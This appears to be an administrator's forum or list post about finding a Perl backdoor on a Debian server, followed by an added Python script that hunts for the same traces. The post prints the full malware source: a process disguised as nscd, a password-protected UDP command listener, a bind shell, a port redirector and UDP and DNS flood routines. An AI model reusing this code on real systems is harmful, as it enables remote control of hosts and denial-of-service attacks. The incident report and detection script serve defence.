Hello, I logged in to my server today to find that /usr/sbin/nscd was running about 50 copies; since I don't have BIND installed, obviously something was up... They were also running as the user www-data. After a little bit of research I found a new crontab entry:

File: /tmp/crontab.XXXXLYukbF
0 * * * * /tmp/.nscdrecover

This starts at:

auth.log.0:Jun 6 17:00:01 debian PAM_unix[26934]: (cron) session opened for user www-data by (uid=0)
auth.log.0:Jun 6 17:00:02 debian PAM_unix[26934]: (cron) session closed for user www-data

and runs every hour, and under SYSLOG it starts:

syslog.3:Jun 6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
syslog.3:Jun 6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
syslog.3:Jun 6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
syslog.3:Jun 6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)
syslog.3:Jun 6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)

So I found /tmp/.nscdrecover, and it looks like some kind of port scanner/trojan. The contents are pasted below:

#!/usr/bin/perl -w
$pass = "J9YcGEyNypkzI";
$str = 'Mess with the best - die like a rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;
sub redir {
  my $port = shift;
  my $dest = shift;
  $SIG{ALRM} = sub { exit };
  alarm 60;
  $sa = IO::Socket::INET->new( Proto => "tcp", Listen => 1, ReuseAddr => 1, LocalPort =>$port) or exit;
  $sin = $sa->accept or exit;
  close($sa);
  alarm 0;
  $sout = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $dest) or exit;
  $sin->autoflush(1);
  $sout->autoflush(1);
  $sel = IO::Select->new($sin, $sout);
  while(@sock = $sel->can_read(180)) {
    foreach $s(@sock) {
      $buf = <$s>;
      exit unless($buf);
      print $sout $buf if($s eq $sin);
      print $sin $buf if($s eq $sout);
    }
  }
}
sub shell {
  my $port = shift;
  $SIG{ALRM} = sub { exit };
  alarm 60;
  use Socket;
  socket(S, PF_INET, SOCK_STREAM, 0);
  setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
  bind(S, sockaddr_in($port, INADDR_ANY));
  listen(S, 1);
  accept(X, S);
  close(S);
  alarm 0;
  open STDIN, "<&X";
  open STDOUT, ">&X";
  open STDERR, ">&X";
  close X;
  exec("/bin/sh");
}
sub udp {
  my $host = shift;
  my $time = shift;
  $sock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host, PeerPort => int(rand 65535)) or exit;
  $sock->autoflush(1);
  $SIG{ALRM} = sub { exit };
  alarm 15 unless(alarm $time);
  print $sock $str while(1);
}
}
sub ddns {
  my $host = shift;
  my $time = shift;
  $sock = new IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host, PeerPort => 53) or exit;
  $sock->autoflush(1);
  $SIG{ALRM} = sub { exit };
  alarm 15 unless(alarm $time);
  while(1) {
    my $s = int(rand(89)+10);
    my $r1 = int(rand(89)+10);
    my $r2 = int(rand(89)+10);
    my $r3 = int(rand(89)+10);
    my $r4 = int(rand(89)+10);
    send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);
  }
}
$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, "</dev/null";
open STDOUT, ">/dev/null";
open STDERR, ">/dev/null";
POSIX::setsid();
$csock = IO::Socket::INET->new(Proto => 'udp', LocalPort => 1337, ReuseAddr => 1) or exit;
while($string =<$csock>) {
  chop($string);
  my ($pw, $cmd, $arg1, $arg2) = split " ", $string;
  next unless($cmd);
  next unless($arg1);
  next unless(crypt($pw, $pass) eq $pass);
  if ($cmd eq "ping") {
    my $bsock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $arg1, PeerPort => $arg2, ReuseAddr => 1) or next;
    print $bsock "pong ".`uname -mnrs`;
    close $bsock;
  } elsif ($cmd eq "die") {
    exit if(crypt($arg1, $pass) eq $pass);
  } elsif ($cmd eq "redir") {
    redir($arg1, $arg2) unless(fork);
  } elsif ($cmd eq "shell") {
    shell($arg1) unless(fork);
  } elsif ($cmd eq "udp") {
    udp($arg1, $arg2) unless(fork);
  } elsif ($cmd eq "ddns") {
    ddns($arg1, $arg2) unless(fork);
  }
}

A little history: my server was hacked with some trojan that was sending out SPAM, and I did a fresh reinstall with Debian so I could have automatic updates and the like. I copied over a few of the home directories from the old site. Then this all started after a user logged in on Friday, June 6th; first login at 14:16, ending 14:24; the script starts at 14:27.

worldspe ftpd26405 pm6-s104.amazon. Fri Jun 6 15:06 - 15:06 (00:00)
worldspe ftpd26325 pm6-s104.amazon. Fri Jun 6 14:51 - 14:51 (00:00)
worldspe ftpd26315 pm6-s104.amazon. Fri Jun 6 14:49 - 14:49 (00:00)
worldspe ftpd26291 pm6-s104.amazon. Fri Jun 6 14:43 - 14:44 (00:00)
worldspe ftpd26183 pm6-s104.amazon. Fri Jun 6 14:16 - 14:24 (00:07)

The question is: could this have been started via a PHP script, and if so, what should I look for in order to neutralize it and communicate with this user? I already moved the /tmp file out. While grepping the PHP files I found nothing that had /tmp or nscd listed in it at all. This is just kind of weird, and I was wondering if anybody could be of help. Also, no other files or cgi-bin files were uploaded, so it might just be a coincidence, but my logic points to it being something that happened via something that was uploaded. I just don't know where this came from. I am running Debian 3.0 woody with all security update files. I ran rtkitchk and found nothing. So I'm really perplexed as to what could have got this script on the server. Any help would be greatly appreciated, as I found nothing about this script by Google.
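The two traces in this mail, a web-server account rewriting its crontab and running a job out of /tmp, and a Perl process that renames itself to /usr/sbin/nscd (padded with spaces) via $0, can both be hunted for mechanically. The script below is an added example, not part of the original mail and not a Debian tool; it assumes Python 3.7+ on an analysis host (not the woody box itself), the SERVICE_ACCOUNTS list is a hypothetical site policy, the SAMPLE_LOG lines are constructed after the ones quoted above, and make_sample_proc() builds a fake /proc tree as constructed test data so the process check can be exercised offline.

```python
"""Hunt for cron activity by a web-server account and for processes whose
argv[0] claims to be a system daemon while the executable is an interpreter.
Added example; not the original poster's code or a Debian tool."""
import os
import re
import tempfile
from dataclasses import dataclass

# Hypothetical site policy: accounts that should never own cron jobs here.
SERVICE_ACCOUNTS = {"www-data", "nobody", "ftp"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"perl", "python", "ruby", "sh", "bash", "dash"}
SHELLS = {"sh", "bash", "dash"}  # /bin/sh resolving to dash is not a mismatch

# Debian cron log shape, e.g.
#   Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
#   Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
CRON_LINE = re.compile(
    r"^[A-Z][a-z]{2}\s+\d{1,2}\s+\d\d:\d\d:\d\d\s+\S+\s+"
    r"(?:crontab|/USR/SBIN/CRON|CRON)\[\d+\]:\s+"
    r"\((?P<user>[^)]+)\)\s+(?P<action>[A-Z]+)\s+\((?P<arg>.*)\)\s*$"
)
# "/." followed by something other than '.', '/' or whitespace: a hidden path component
HIDDEN_COMPONENT = re.compile(r"/\.(?![./\s])")

# Constructed sample lines modelled on the ones quoted in the mail.
SAMPLE_LOG = """\
Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
Jun  6 17:05:01 debian /USR/SBIN/CRON[26950]: (root) CMD (test -x /usr/sbin/anacron || run-parts --report /etc/cron.hourly)
Jun  6 17:10:00 debian sshd[26960]: Accepted password for alice from 192.0.2.10 port 4242 ssh2
""".splitlines()


@dataclass
class Finding:
    source: str   # the log line, or "pid N"
    reason: str
    detail: str


def scan_cron_log(lines):
    """Return one Finding per cron/crontab log line that looks wrong."""
    findings = []
    for line in lines:
        m = CRON_LINE.match(line.rstrip("\n"))
        if not m:
            continue
        user, action, arg = m["user"], m["action"], m["arg"]
        reasons = []
        if action == "REPLACE" and user in SERVICE_ACCOUNTS:
            reasons.append(f"crontab rewritten by service account {user}")
        if action == "CMD":
            if arg.startswith(SCRATCH_DIRS):
                reasons.append("job runs from a world-writable scratch directory")
            if HIDDEN_COMPONENT.search(arg):
                reasons.append("job path contains a hidden (dot) component")
        if reasons:
            findings.append(Finding(line.strip(), "; ".join(reasons), f"user={user} action={action} arg={arg}"))
    return findings


def _norm(path):
    # basename without a version suffix: /usr/bin/perl5.36 -> perl, python3.11 -> python
    return re.sub(r"[\d.]+$", "", os.path.basename(path))


def scan_procs(proc_root="/proc"):
    """Compare what each process calls itself (argv[0]) with the binary it really runs."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pdir = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(pdir, "cmdline"), "rb") as fh:
                argv = fh.read().split(b"\0")
            exe = os.readlink(os.path.join(pdir, "exe"))
        except OSError:
            continue  # kernel threads have no exe; other users' exe links are unreadable
        if not argv or not argv[0]:
            continue
        argv0 = argv[0].decode("utf-8", "replace")
        claimed, actual = _norm(argv0.rstrip()), _norm(exe.replace(" (deleted)", ""))
        reasons = []
        if argv0 != argv0.rstrip():
            reasons.append("argv[0] padded with whitespace to hide the real command line")
        if actual in INTERPRETERS and claimed != actual and not (claimed in SHELLS and actual in SHELLS):
            reasons.append(f"claims to be {claimed!r} but runs {actual!r}")
        if reasons:
            findings.append(Finding(f"pid {entry}", "; ".join(reasons), f"argv0={argv0.rstrip()!r} exe={exe}"))
    return findings


def make_sample_proc():
    """Constructed fake /proc tree: init, an honest perl script, and the $0 trick."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    samples = {
        "1": (b"/sbin/init\0", "/sbin/init"),
        "4242": (b"/usr/bin/perl\0/usr/local/bin/report.pl\0", "/usr/bin/perl"),
        "26934": (b"/usr/sbin/nscd" + b" " * 100 + b"\0", "/usr/bin/perl"),
    }
    for pid, (cmdline, exe) in samples.items():
        os.mkdir(os.path.join(root, pid))
        with open(os.path.join(root, pid, "cmdline"), "wb") as fh:
            fh.write(cmdline)
        os.symlink(exe, os.path.join(root, pid, "exe"))
    return root


if __name__ == "__main__":
    for f in scan_cron_log(SAMPLE_LOG) + scan_procs(make_sample_proc()):
        print(f"{f.source}\n    {f.reason}\n    {f.detail}")
```

Run against the sample data it reports the two www-data lines (the REPLACE and the hourly CMD out of /tmp) and the one fake process whose argv[0] is a padded "/usr/sbin/nscd" but whose exe is perl; root's run-parts job and the honest perl script are not flagged. Pointing scan_procs() at the real /proc of a live host gives the process-side check; it needs root to read other users' exe links.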